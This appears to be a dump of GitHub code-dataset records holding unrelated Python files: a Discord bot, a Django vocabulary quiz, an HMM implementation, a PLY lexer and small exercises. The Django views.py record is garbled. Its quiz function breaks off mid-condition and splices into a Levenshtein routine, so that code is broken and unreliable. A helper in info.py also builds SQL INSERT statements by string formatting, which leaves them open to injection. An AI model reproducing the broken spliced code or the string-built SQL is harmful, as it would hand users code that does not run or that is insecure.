use `url` to format URLs and `normal`\n to do normal string formatting\n ]\n \"\"\"\n stripped_str = \"\"\n\n if format_as == \"url\":\n stripped_str = re.sub(\" +\", \"\", str)\n elif format_as == \"normal\":\n stripped_str = re.sub(\" +\", \" \", str)\n\n return stripped_str\n","repo_name":"Cimmanuel/animated-adventure","sub_path":"woice/chat/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1878047137","text":"print('ex0905')\nfname = input('Enter File Name: ')\nif len(fname) < 1 :\n fname = 'mbox-short.txt'\n\nschool = dict()\n\nfhand = open(fname)\nfor line in fhand:\n line = line.rstrip()\n if not line.startswith('From ') :\n continue\n line = line.split()\n email = line[1]\n atpos = email.find(\"@\")\n email = email[atpos+1:]\n school[email] = school.get(email, 0) + 1\nprint(school)\n","repo_name":"kyawsaw/py4e","sub_path":"chapter09/ex0905.py","file_name":"ex0905.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36446330606","text":"import pdb\nimport random\n\nimport numpy as np\nfrom torch.utils import data\nfrom loader.metadata import ImagenetMetadata\nfrom loader.loader import DataFromMetadata, ClassBalancedSampler\n\nIMAGENET_DIR = '/v9/whshin/imagenet_l2s_84_84'\nDEVKIT_DIR = '/v9/whshin/imagenet/ILSVRC2012_devkit_t12'\n\n\ndef split_meta(meta, mode):\n if mode == 'class':\n # [episode] i\n s, q = meta.split_classes(0.3) # meta-s : meta_q = 30 : 70\n # [meta_train] j\n s_load = s.get_loader(batch_size=128)\n import pdb; pdb.set_trace()\n # s = s.sample_classes(0.5) # 35 x 10 = 350\n\n\n elif mode == 'instance':\n s, q = meta.split_instances(0.7)\n ss, sq = s.split_instances(0.7)\n qs, qq = q.split_instances(0.7)\n print(f'Split mode: {mode}')\n print('Number of classes:')\n print(f'\\ts({len(s)}), q({len(q)})')\n print(f'\\tss({len(ss)}), qs({len(qs)})')\n print(f'\\tsq({len(sq)}), qq({len(qq)})')\n print('Number of samples in the first class:')\n print(f'\\ts({s.idx_to_len[s.abs_idx[0]]}), '\n f'q({q.idx_to_len[q.abs_idx[0]]})')\n print(f'\\tss({ss.idx_to_len[ss.abs_idx[0]]}), '\n f'qs({qs.idx_to_len[qs.abs_idx[0]]})')\n print(f'\\tsq({sq.idx_to_len[sq.abs_idx[0]]}), '\n f'qq({qq.idx_to_len[qq.abs_idx[0]]})')\n return s, q, ss, sq\n\n\nsplit = 'class'\nrandom.seed(1)\nnp.random.seed(1)\nmeta = ImagenetMetadata.load_or_make(\n data_dir=IMAGENET_DIR, devkit_dir=DEVKIT_DIR, remake=False)\nm_train, m_test = meta.split_classes(0.1)\n# s, q, ss, sq = split_meta(m_train, 'instance')\ns, q, ss, sq = split_meta(m_train, 'class')\n\n\n\n\n\nimport pdb; pdb.set_trace()\n\npdb.set_trace()\nprint('end')\n","repo_name":"ricoshin/learn2sample","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"20930835495","text":"myUniqueList = []\r\nmyRejectList = []\r\nAddValue = False\r\ndef addRejectValue(Var):\r\n #adding Rejected(Non unique or repeated values) Values to a separate List\r\n return myRejectList.append(Var)\r\n\r\n\r\ndef addItem(Var):\r\n if Var in myUniqueList:\r\n addRejectValue(Var)\r\n AddValue = False\r\n print(\"myRejectList:\\t\",myRejectList)\r\n return AddValue\r\n else:\r\n myUniqueList.append(Var)\r\n AddValue = True\r\n print(\"myUniqueList:\\t\",myUniqueList)\r\n return 
AddValue\r\n\r\n\r\n\r\n\r\naddItem(2)\r\naddItem(3.6789)\r\naddItem(\"Lists\")\r\naddItem(2)\r\naddItem(3.6789)\r\naddItem(\"HomeworkAssignment #4\")\r\n\r\n","repo_name":"madhurlittu/Python_is_Easy_Pirple","sub_path":"Homework Assignmentt #4.py","file_name":"Homework Assignmentt #4.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15794713649","text":"from discord.ext.commands.core import command\r\nfrom discord.ext import commands\r\n# from . import mal_anime\r\n# from . import mal_manga\r\n\r\nimport discord\r\nimport os\r\nimport platform\r\nimport subprocess\r\nimport src.maplestory.maple as maple\r\nimport src.youtube.youtube as yt\r\nimport src.twitterFetcher.main as twitter_sniffer\r\nimport src.discord.mal_anime as mal_anime\r\nimport src.discord.mal_manga as mal_manga\r\nimport src.twitter_user_storage.user_storage as user_storage\r\nimport asyncio\r\n\r\ndiscord_bot_token = os.environ.get (\"YUNA_DISCORD_SECRET\")\r\nbot_command = commands.Bot (command_prefix=\"->>\")\r\n\r\n@bot_command.event\r\nasync def on_ready ():\r\n    print (\"Logging in as \", bot_command.user.name)\r\n    print (\"id is \", bot_command.user.id)\r\n    print (\"--------\")\r\n\r\n@bot_command.command (name = \"restart\", aliases = [\"r\"], help = \"Restarts the bot. Only the owner can do this.\")\r\n@commands.is_owner()\r\nasync def restart (ctx):\r\n    await ctx.send (\"Restarting my internal brain chemistry...\")\r\n\r\n    current_os_platform = platform.system()\r\n\r\n    if current_os_platform == \"Windows\":\r\n        print (\"Current directory is: \", str(os.getcwd()))\r\n        subprocess.run([\"Start.bat\"], shell = True)\r\n    else:\r\n        subprocess.run([\"Start.sh\"])\r\n\r\n
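# discord.py expects the plural 'aliases' keyword (a list of strings) when\r\n# registering alternate command names; a bare 'alias=' kwarg is not picked up.\r\n# Start.bat / Start.sh above are resolved relative to the working directory.\r\n@bot_command.command (name = \"shutdown\", help = \"Shuts down bot. 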
Only the owner can do this.\")\r\n@commands.is_owner()\r\nasync def shutdown (ctx):\r\n    await ctx.send (\"I'm going to take a nap now.\")\r\n    await bot_command.close()\r\n\r\n@bot_command.command (name = \"anime\", help = \"Search the given anime on MyAnimeList\")\r\nasync def anime (ctx, anime_name):\r\n    anime_query = mal_anime.AnimeQuery (anime_name)\r\n\r\n    await ctx.send (f\"**The anime you're looking for is: {anime_query.search_anime_title()} **\")\r\n    await ctx.send (anime_query.search_anime_url())\r\n    await ctx.send (f\"**Anime score is: {anime_query.search_anime_score ()} **\")\r\n\r\n@bot_command.command (name = \"manga\", help = \"Searches the given manga on MyAnimeList\")\r\nasync def manga (ctx, manga_name):\r\n    manga_query = mal_manga.MangaQuery (manga_name)\r\n\r\n    await ctx.send (f\"**The manga you're looking for is: {manga_query.search_manga_title()} **\")\r\n    await ctx.send (manga_query.serach_manga_url())\r\n    await ctx.send (f\"**Manga score is: {manga_query.search_manga_score()} **\")\r\n\r\n@bot_command.command(name = \"maple\", help = \"Returns the update from Maplestory.\", aliases = [\"maplestory\"])\r\nasync def maplestory(ctx):\r\n    maple_news = maple.get_latest_maple_news()\r\n\r\n    await ctx.send(f\"**Here's the update from Maplestory.** {maple_news}\")\r\n\r\n@bot_command.command(name=\"youtube\", aliases = [\"yt\"], help = \"Returns the video requested.\")\r\nasync def youtube(ctx, *,video_title):\r\n    discord_id = os.environ.get(\"MY_DISCORD_ID\")\r\n\r\n    try:\r\n        entire_message = \"\".join(video_title)\r\n        youtube_video = yt.get_requested_video(entire_message)\r\n\r\n        await ctx.send(youtube_video)\r\n        await asyncio.sleep(10)\r\n    except Exception as e:\r\n        print (e)\r\n\r\n        await ctx.send(f\"<@!{discord_id}> Uh-oh some moron tried to break the command. SMH\")\r\n\r\n@bot_command.command(name=\"twitter_add\", help = \"Stores the usernames for Twitter\")\r\nasync def add_twitter_username(ctx, twitter_usernames):\r\n    if len(twitter_usernames) > 0:\r\n        result = user_storage.insert(twitter_usernames)\r\n        await ctx.send(result)\r\n    else:\r\n        await ctx.send(\"Twitter username cannot be empty.\")\r\n\r\n@bot_command.command(name = \"list\", help = \"Returns all of the stored usernames from database\")\r\nasync def print_twitter_usernames(ctx):\r\n    results = user_storage.print_all_entries()\r\n\r\n    # Converted tuple into a list.\r\n    twitter_usernames_list = list(results)\r\n\r\n    # Using List Comprehension to remove tuple from list.\r\n    # We loop through twice to first get rid of the list and the second loop to go into the tuple.\r\n    twitter_list_output = [twitter_names for item in twitter_usernames_list for twitter_names in item]\r\n\r\n    await ctx.send(twitter_list_output)\r\n\r\n@bot_command.command(name = \"twitter_update\", help = \"Updates an entry in database. 
Format \")\r\n@commands.is_owner()\r\nasync def update_twitter_name(ctx, old_username, new_username):\r\n if len(old_username) and len(new_username) > 0:\r\n result = user_storage.update_entry_from_table(old_username, new_username)\r\n\r\n await ctx.send(result)\r\n else:\r\n await ctx.send(\"Old username or new username cannot be empty.\")\r\n\r\n@bot_command.command(name = \"twitter_remove\", help = \"Removes desired username from database.\")\r\n@commands.is_owner()\r\nasync def remove_twitter_username(ctx, twitter_name):\r\n if len(twitter_name) > 0:\r\n result = user_storage.delete_entry_from_table(twitter_name)\r\n\r\n await ctx.send(result)\r\n else:\r\n await ctx.send(\"Twitter name cannot be empty.\")\r\n\r\n@bot_command.command(name = \"twitter_clear\", help = \"Permanently removes everything from database! Proceed with caution\")\r\n@commands.is_owner()\r\nasync def clear_twitter_database(ctx):\r\n user_storage.clear_database()\r\n await ctx.send(\"**I've erased everything from database. If that was a mistake, then looks like you have to repopulate the table -Get fucked KEKW-.**\")\r\n\r\n@bot_command.command(name=\"twitter\", help = \"Retrevie latest tweet from set user\")\r\nasync def twitter(ctx, twitter_user):\r\n # twitter_sniffer\r\n\r\n # await ctx.send()\r\n pass","repo_name":"KevinLu19/Discord_Bot","sub_path":"src/discord/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4025796871","text":"\ndef setDictData(url):\n # 获取数据\n # ([a-z]\\w+) --> '$1'\n dict = {\n\n 'id' :'100',\n 'acode' :'cn', # 区域信息 \n 'scode' :'10', # 内容栏目\n 'subscode' :'0', # 内容副栏目\n 'title' :'测试文章1', # 内容标题\n 'titlecolor' :'#333333', # 标题颜色\n 'subtitle' :'测试副标题', # 副标题\n 'filename' :'测试链接', # 自定义路径\n 'author' :'厚德', # 作者\n 'source' :'本站', # 来源\n 'outlink' :'原始链接', # 跳转外链���\n 'date' :'时间', # 发布时间\n 'ico' :'', # 缩略图\n 'pics' :'', # 轮播多图\n 'content' :'文章', # 内容\n 'enclosure' :'附件', # 附件\n 'keywords' :'动机', # 页面关键字\n 'description' :'动机', # 页面描述\n 'status' :'1', # 状态\n 'istop' :'0', # 置顶\n 'isrecommend' :'0', # 推荐\n 'isheadline' :'0' # 头条\n }\n\n return dict\n\ndef setSmallDict(id):\n dict = {\n 'id' : id,\n 'acode':'cn',\n 'scode':'10',\n 'title':' 测试题目'\n }\n return dict\n\ndef dict2SQL(table,my_dict,):\n COLstr='' #列的字段\n ROWstr='' #行字段\n\n ColumnStyle=' VARCHAR(20)'\n for key in my_dict.keys():\n COLstr=COLstr+' '+key+ColumnStyle+',' \n ROWstr=(ROWstr+'\"%s\"'+',')%(my_dict[key])\n\n sql4 = \"INSERT INTO %s VALUES (%s)\"%(table,ROWstr[:-1])\n print(sql4)\n\n return sql4\n\n\n\n\n\n\n","repo_name":"SChen1024/CMS_article","sub_path":"sina/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9524580","text":"import re\n\nchat_list = []\nwith open('../private-information/chat_hist.txt', encoding=\"utf8\") as f:\n lines = f.readlines()\n chat_list.append(lines)\n\ncarryover = \"\"\nhasCarry = False\noutput_chatlist = []\n\nfor i in chat_list[0][::-1]:\n if re.match('\\d\\d\\d\\d/\\d\\d/\\d\\d, \\d\\d:\\d\\d -',i):\n if hasCarry:\n i = i.strip() + \" \" + carryover + \"\\n\"\n hasCarry = False\n carryover = \"\"\n output_chatlist.append(i)\n else:\n hasCarry = True\n carryover = i.strip() + \" \" + carryover\n\nwith open(\"../private-information/chat_hist_nocarry.txt\", mode=\"w\", encoding=\"utf8\") as f:\n for line in output_chatlist[::-1]: 
f.write(line)","repo_name":"Scotts-Bots/AI-Chatbots","sub_path":"bert-discord-bot/remove_multiline_carry.py","file_name":"remove_multiline_carry.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"17647830439","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponse\n\nfrom django.template import RequestContext, loader\n\nfrom django.utils import timezone\n\n#models\nfrom vocabTest.models import Word, Question, LevenshteinPair\n\n#other python libraries\nfrom random import choice, randint\n\n'''session variables:\nquestions_asked: number of questions asked in the quiz so far\ntotal_questions: number of questions to be asked in the quiz\ncorrect: was the last question answered correctly\nproblem_quiz: does the user want to review words that they struggle with\n'''\n\n# Create your views here.\ndef index(request):\n request.session['questions_asked'] = 0;\n request.session['problem_quiz'] = False;\n request.session['total_questions'] = 50;\n request.session['correct'] = None;\n return render(request, 'vocabTest/index.html');\n\ndef viewWords(request):\n # obtain the full list of words CHANGE TO GET REQUESTS\n words = Word.objects.all().order_by('word')\n return render(request, 'vocabTest/viewwords.html', {'words':words});\n \ndef quiz(request, **kwargs):\n try:\n # if the problematic quiz was chosen\n request.session['problem_quiz'] = kwargs['problem']\n except:\n #do nothing otherwise\n pass;\n #print(request.session['problem_quiz'])\n #handles when to stop the quiz\n if request.session['questions_asked'] len(word2):\n word1,word2 = word2,word1\n #create and initialize a 2d array\n cost = 100\n total = [[0 for i in range(len(word2))] for j in range(len(word1))]\n for i in range(len(word1)):\n for j in range(len(word2)):\n # calculate the cost of the current location\n if word1[i] != word2[j]:\n cost = 1\n else:\n cost = 0\n \n # base cases\n if i==0 and j==0:\n total[i][j] = cost\n elif i==0 and j!=0:\n total[i][j] = total[i][j-1] + cost\n elif i!=0 and j==0:\n total[i][j] = total[i-1][j] + cost\n else:\n total[i][j] = min(total[i-1][j], total[i-1][j-1], total[i][j-1]) + cost\n return total[len(word1)-1][len(word2)-1] \n \ndef answer(request, question_id):\n #obtain the relevant question\n q = get_object_or_404(Question, pk=question_id)\n wordUpdate = q.word_set.all()\n ans = wordUpdate[0]\n try:\n #convert to int, substring the first part\n if q.right_choice == int(request.POST['choice'][0]):\n request.session['correct']=True\n ans.num_correct = ans.num_correct + 1\n print(\"CORRECT {0}\".format(ans.num_correct))\n else:\n # set the last wrong choice, substring after the choice number\n ans.last_wrong_choice = request.POST['choice'][1:len(request.POST['choice'])]\n request.session['correct']=False\n print(\"INCORRECT\")\n except:\n #user gave invalid input\n return render(request, 'vocabTest/quiz.html', {'word':wordUpdate[0], 'question':q, 'choices':[q.choice_1, q.choice_2, q.choice_3, q.choice_4, q.choice_5], 'error_message':'You didn\\'t select an option'})\n \n ans.is_a_problem()\n ans.save()\n \n #delete the question\n q.delete()\n \n return quiz(request);\n \n ","repo_name":"woodphil/djangoVocab","sub_path":"vocabTest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42258457517","text":"\"\"\"\nFilename: 
HMM.py\nVersion: 1.0\nDate: 2018/3/9\n\nDescription: Implements unsupervised HMM learning and emission. Adapted from \n Homework 6 solutions.\n\nAuthor(s): Andrew Kang, Garret Sullivan\nOrganization: California Institute of Technology\n\"\"\"\n\nimport numpy as np\nimport random\n\nclass HiddenMarkovModel:\n '''\n Class implementation of Hidden Markov Models.\n '''\n\n def __init__(self, A, O):\n '''\n Initializes an HMM. Assumes the following:\n - States and observations are integers starting from 0. \n - There is a start state (see notes on A_start below). There\n is no integer associated with the start state, only\n probabilities in the vector A_start.\n - There is no end state. \n\n Arguments:\n A: Transition matrix with dimensions L x L.\n The (i, j)^th element is the probability of\n transitioning from state i to state j. Note that\n this does not include the starting probabilities.\n\n O: Observation matrix with dimensions L x D.\n The (i, j)^th element is the probability of\n emitting observation j given state i.\n\n Parameters:\n L: Number of states.\n\n D: Number of observations.\n \n A: The transition matrix.\n \n O: The observation matrix.\n \n A_start: Starting transition probabilities. The i^th element\n is the probability of transitioning from the start\n state to state i. For simplicity, we assume that\n this distribution is uniform.\n '''\n\n self.L = len(A)\n self.D = len(O[0])\n self.A = A\n self.O = O\n self.A_start = [1. / self.L for _ in range(self.L)]\n\n\n def forward(self, x, normalize=False):\n '''\n Uses the forward algorithm to calculate the alpha probability\n vectors corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n normalize: Whether to normalize each set of alpha_j(i) vectors\n at each i. This is useful to avoid underflow in\n unsupervised learning.\n\n Returns:\n alphas: Vector of alphas.\n\n The (i, j)^th element of alphas is alpha_j(i),\n i.e. the probability of observing prefix x^1:i\n and state y^i = j.\n\n e.g. alphas[1][0] corresponds to the probability\n of observing x^1:1, i.e. the first observation,\n given that y^1 = 0, i.e. the first state is 0.\n '''\n\n M = len(x) # Length of sequence.\n alphas = [[0. for _ in range(self.L)] for _ in range(M + 1)]\n\n # Note that alpha_j(0) is already correct for all j's.\n # Calculate alpha_j(1) for all j's.\n for curr in range(self.L):\n alphas[1][curr] = self.A_start[curr] * self.O[curr][x[0]]\n\n # Calculate alphas throughout sequence.\n for t in range(1, M):\n # Iterate over all possible current states.\n for curr in range(self.L):\n prob = 0\n\n # Iterate over all possible previous states to accumulate\n # the probabilities of all paths from the start state to\n # the current state.\n for prev in range(self.L):\n prob += alphas[t][prev] \\\n * self.A[prev][curr] \\\n * self.O[curr][x[t]]\n\n # Store the accumulated probability.\n alphas[t + 1][curr] = prob\n\n if normalize:\n norm = sum(alphas[t + 1])\n for curr in range(self.L):\n alphas[t + 1][curr] /= norm\n\n return alphas\n\n\n def backward(self, x, normalize=False):\n '''\n Uses the backward algorithm to calculate the beta probability\n vectors corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n normalize: Whether to normalize each set of alpha_j(i) vectors\n at each i. 
This is useful to avoid underflow in\n unsupervised learning.\n\n Returns:\n betas: Vector of betas.\n\n The (i, j)^th element of betas is beta_j(i), i.e.\n the probability of observing prefix x^(i+1):M and\n state y^i = j.\n\n e.g. betas[M][0] corresponds to the probability\n of observing x^M+1:M, i.e. no observations,\n given that y^M = 0, i.e. the last state is 0.\n '''\n\n M = len(x) # Length of sequence.\n betas = [[0. for _ in range(self.L)] for _ in range(M + 1)]\n\n # Initialize initial betas.\n for curr in range(self.L):\n betas[-1][curr] = 1\n\n # Calculate betas throughout sequence.\n for t in range(-1, -M - 1, -1):\n # Iterate over all possible current states.\n for curr in range(self.L):\n prob = 0\n\n # Iterate over all possible next states to accumulate\n # the probabilities of all paths from the end state to\n # the current state.\n for nxt in range(self.L):\n if t == -M:\n prob += betas[t][nxt] \\\n * self.A_start[nxt] \\\n * self.O[nxt][x[t]]\n\n else:\n prob += betas[t][nxt] \\\n * self.A[curr][nxt] \\\n * self.O[nxt][x[t]]\n\n # Store the accumulated probability.\n betas[t - 1][curr] = prob\n\n if normalize:\n norm = sum(betas[t - 1])\n for curr in range(self.L):\n betas[t - 1][curr] /= norm\n\n return betas\n\n\n def unsupervised_learning(self, X, N_iters):\n '''\n Trains the HMM using the Baum-Welch algorithm on an unlabeled\n datset X. Note that this method does not return anything, but\n instead updates the attributes of the HMM object.\n\n Arguments:\n X: A dataset consisting of input sequences in the form\n of lists of length M, consisting of integers ranging\n from 0 to D - 1. In other words, a list of lists.\n\n N_iters: The number of iterations to train on.\n '''\n\n # Note that a comment starting with 'E' refers to the fact that\n # the code under the comment is part of the E-step.\n\n # Similarly, a comment starting with 'M' refers to the fact that\n # the code under the comment is part of the M-step.\n\n for iteration in range(1, N_iters + 1):\n if iteration % 10 == 0:\n print(\"Iteration: \" + str(iteration))\n\n # Numerator and denominator for the update terms of A and O.\n A_num = [[0. for i in range(self.L)] for j in range(self.L)]\n O_num = [[0. for i in range(self.D)] for j in range(self.L)]\n A_den = [0. for i in range(self.L)]\n O_den = [0. for i in range(self.L)]\n\n # For each input sequence:\n for x in X:\n M = len(x)\n # Compute the alpha and beta probability vectors.\n alphas = self.forward(x, normalize=True)\n betas = self.backward(x, normalize=True)\n\n # E: Update the expected observation probabilities for a\n # given (x, y).\n # The i^th index is P(y^t = i, x).\n for t in range(1, M + 1):\n P_curr = [0. for _ in range(self.L)]\n \n for curr in range(self.L):\n P_curr[curr] = alphas[t][curr] * betas[t][curr]\n\n # Normalize the probabilities.\n norm = sum(P_curr)\n for curr in range(len(P_curr)):\n P_curr[curr] /= norm\n\n for curr in range(self.L):\n if t != M:\n A_den[curr] += P_curr[curr]\n O_den[curr] += P_curr[curr]\n O_num[curr][x[t - 1]] += P_curr[curr]\n\n # E: Update the expectedP(y^j = a, y^j+1 = b, x) for given (x, y)\n for t in range(1, M):\n P_curr_nxt = [[0. 
for _ in range(self.L)] for _ in range(self.L)]\n\n for curr in range(self.L):\n for nxt in range(self.L):\n P_curr_nxt[curr][nxt] = alphas[t][curr] \\\n * self.A[curr][nxt] \\\n * self.O[nxt][x[t]] \\\n * betas[t + 1][nxt]\n\n # Normalize:\n norm = 0\n for lst in P_curr_nxt:\n norm += sum(lst)\n for curr in range(self.L):\n for nxt in range(self.L):\n P_curr_nxt[curr][nxt] /= norm\n\n # Update A_num\n for curr in range(self.L):\n for nxt in range(self.L):\n A_num[curr][nxt] += P_curr_nxt[curr][nxt]\n\n for curr in range(self.L):\n for nxt in range(self.L):\n self.A[curr][nxt] = A_num[curr][nxt] / A_den[curr]\n\n for curr in range(self.L):\n for xt in range(self.D):\n self.O[curr][xt] = O_num[curr][xt] / O_den[curr]\n\n\n def generate_emission(self, M):\n '''\n Generates an emission of length M, assuming that the starting state\n is chosen uniformly at random. \n\n Arguments:\n M: Length of the emission to generate.\n\n Returns:\n emission: The randomly generated emission as a list.\n\n states: The randomly generated states as a list.\n '''\n\n emission = []\n state = random.choice(range(self.L))\n states = []\n\n for t in range(M):\n # Append state.\n states.append(state)\n\n # Sample next observation.\n rand_var = random.uniform(0, 1)\n next_obs = 0\n\n while rand_var > 0:\n rand_var -= self.O[state][next_obs]\n next_obs += 1\n\n next_obs -= 1\n emission.append(next_obs)\n\n # Sample next state.\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= self.A[state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n\n return emission, states\n\n\n def generate_line(self, syllables, syllable_dict, reverse=False, initial=None):\n '''\n Generates an emission with a set number of syllables, assuming that the \n starting state is chosen uniformly at random. 
\n\n Arguments:\n syllables: Number of syllables in the emission to generate.\n syllable_dict: Information about the syllables of each word.\n reverse: Whether to perform generaation forwards or backwards.\n initial: The initial observation in the generated output.\n\n Returns:\n emission: The randomly generated emission as a list.\n\n states: The randomly generated states as a list.\n '''\n \n emission = []\n states = []\n state = None\n \n normal_syllable_count = [0]\n end_syllable_count = [0]\n \n # Reverse the transitions matrix if we're generating backwards\n transitions = self.A\n if reverse:\n #transitions = list(map(list, zip(*self.A)))\n transitions = np.array(transitions).T.tolist()\n \n # Renormalize each row of the transitions matrix\n for i in range(len(transitions)):\n transitions[i] = [transitions[i][j]/sum(transitions[i]) for j in range(len(transitions[i]))] \n \n if initial != None:\n # We have the initial word for this line already\n emission.append(initial)\n \n normal_syllable_count = syllable_dict[initial]['normal']\n end_syllable_count = normal_syllable_count + syllable_dict[initial]['end'] \n \n # Find the probability that a given state would generate this word\n prob_states = list(map(list, zip(*self.O)))[initial]\n prob_states = [prob_states[i]/sum(prob_states) for i in range(len(prob_states))]\n \n # Sample the initial state for this word\n rand_var = random.uniform(0, 1)\n initial_state = 0\n\n while rand_var > 0:\n rand_var -= prob_states[initial_state]\n initial_state += 1\n\n initial_state -= 1\n states.append(initial_state)\n \n # Sample the next state as well using the initial state\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= transitions[initial_state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n else:\n # We don't have anything; just pick an initial state\n state = random.choice(range(self.L))\n \n # Generate words until we reach the requested number of syllables\n while syllables not in end_syllable_count:\n # Add the state to the beginning or end of the state list\n if reverse:\n states.insert(0, state)\n else:\n states.append(state)\n\n # Sample next observation.\n rand_var = random.uniform(0, 1)\n next_obs = 0\n \n # Zero out the weights of words whose syllables would not fit in this line\n possible_emissions = list(self.O[state])\n for i in range(len(possible_emissions)):\n if i not in syllable_dict:\n possible_emissions[i] = 0\n else:\n word_syllables = syllable_dict[i]['normal'] + syllable_dict[i]['end']\n if min(normal_syllable_count) + min(word_syllables) > 10:\n possible_emissions[i] = 0\n possible_emissions = [possible_emissions[i]/sum(possible_emissions) for i in range(len(possible_emissions))]\n\n while rand_var > 0:\n rand_var -= possible_emissions[next_obs]\n next_obs += 1\n\n next_obs -= 1\n \n # Add the emission to the beginning or end of the emission list\n if reverse:\n emission.insert(0, next_obs)\n else:\n emission.append(next_obs)\n \n # Keep track of how many syllables this line could have\n obs_syllables_normal = syllable_dict[next_obs]['normal']\n obs_syllables_end = syllable_dict[next_obs]['end']\n \n new_normal_syllable_count = []\n new_end_syllable_count = []\n \n for i in range(len(normal_syllable_count)):\n # Add syllables in this word to syllables of the line\n for j in range(len(obs_syllables_normal)):\n new_normal_syllable_count.append(normal_syllable_count[i] + obs_syllables_normal[j])\n \n # Include all previous possibilies plus the end possibilies 
for this word\n new_end_syllable_count = list(new_normal_syllable_count)\n for j in range(len(obs_syllables_end)):\n new_end_syllable_count.append(normal_syllable_count[i] + obs_syllables_end[j])\n \n # Update the syllable counts\n normal_syllable_count = new_normal_syllable_count\n end_syllable_count = new_end_syllable_count\n \n # Sample next state.\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= transitions[state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n\n return emission, states\n \n \n def save(self, filename):\n ''' Save the HMM to file. '''\n \n file = open(filename, 'w')\n \n # Save the parameters\n file.write(str(self.L) + \"\\t\" + str(self.D) + \"\\n\")\n \n # Save the transition matrix\n for i in range(len(self.A)):\n file.write(\"\\t\".join(str(x) for x in self.A[i]) + \"\\n\")\n \n # Save the observation matrix\n for i in range(len(self.O)):\n file.write(\"\\t\".join(str(x) for x in self.O[i]) + \"\\n\")\n \n file.close()\n \n\ndef load(filename):\n ''' Load an HMM from file. '''\n \n A = []\n O = []\n \n file = open(filename, 'r')\n \n # Read the parameters\n L, D = [int(x) for x in file.readline().strip().split('\\t')]\n\n # Read the transition matrix\n for i in range(L):\n A.append([float(x) for x in file.readline().strip().split('\\t')])\n\n # Read the observation matrix\n for i in range(L):\n O.append([float(x) for x in file.readline().strip().split('\\t')])\n \n file.close()\n \n return HiddenMarkovModel(A, O)\n \n\ndef unsupervised_HMM(X, n_states, N_iters):\n '''\n Helper function to train an unsupervised HMM. The function determines the\n number of unique observations in the given data, initializes\n the transition and observation matrices, creates the HMM, and then runs\n the training function for unsupervised learing.\n\n Arguments:\n X: A dataset consisting of input sequences in the form\n of lists of variable length, consisting of integers \n ranging from 0 to D - 1. 
In other words, a list of lists.\n\n n_states: Number of hidden states to use in training.\n \n N_iters: The number of iterations to train on.\n '''\n\n # Make a set of observations.\n observations = set()\n for x in X:\n observations |= set(x)\n \n # Compute L and D.\n L = n_states\n D = len(observations)\n\n # Randomly initialize and normalize matrices A and O.\n A = [[random.random() for i in range(L)] for j in range(L)]\n\n for i in range(len(A)):\n norm = sum(A[i])\n for j in range(len(A[i])):\n A[i][j] /= norm\n \n # Randomly initialize and normalize matrix O.\n O = [[random.random() for i in range(D)] for j in range(L)]\n\n for i in range(len(O)):\n norm = sum(O[i])\n for j in range(len(O[i])):\n O[i][j] /= norm\n\n # Train an HMM with unlabeled data.\n HMM = HiddenMarkovModel(A, O)\n HMM.unsupervised_learning(X, N_iters)\n\n return HMM\n\n","repo_name":"Interflux/cs155-miniproject3","sub_path":"HMM.py","file_name":"HMM.py","file_ext":"py","file_size_in_byte":19768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19348798202","text":"\"\"\"\nlex.py\n\nTokenizer for vslc\n\nparameters for build():\n debug=1: Enable debug features\n optimize=1: Force set -o option to 1 when specifying -o option to python\n\"\"\"\nimport ply.lex as lex\n\nfrom config import lexer_debug, lexer_optimize\n\n\nclass VSLCLexer(object):\n\n lexer = None # Wait to be initialized\n\n # All lexers must provide a list `tokens` that defines all of the possible token names\n # that can be produced by the lexer.\n tokens = [\n 'NUMBER', # [0-9]*\n 'PLUS', # +\n 'MINUS', # -\n 'TIMES', # *\n 'DIVIDE', # /\n 'LPAREN', # (\n 'RPAREN', # )\n 'LBRACK', # {\n 'RBRACK', # }\n 'ASSIGN', # :=\n 'COMMA', # ,\n 'TEXT', # \".*\"\n 'ID', # [A-Za-z]([A-Za-z]|[0-9])*\n ]\n\n # To handle reserved words (keywords), you should write a single rule to match an identifier\n # and do a special name lookup in a function\n reserved = {\n 'FUNC': 'FUNC',\n 'VAR': 'VAR',\n 'PRINT': 'PRINT',\n 'RETURN': 'RETURN',\n\n 'IF': 'IF',\n 'THEN': 'THEN',\n 'ELSE': 'ELSE',\n 'FI': 'FI',\n\n 'WHILE': 'WHILE',\n 'DO': 'DO',\n 'DONE': 'DONE',\n }\n\n tokens += list(reserved.values())\n\n # Regular expression rules for simple tokens\n # Each token is specified by writing a regular expression rule compatible 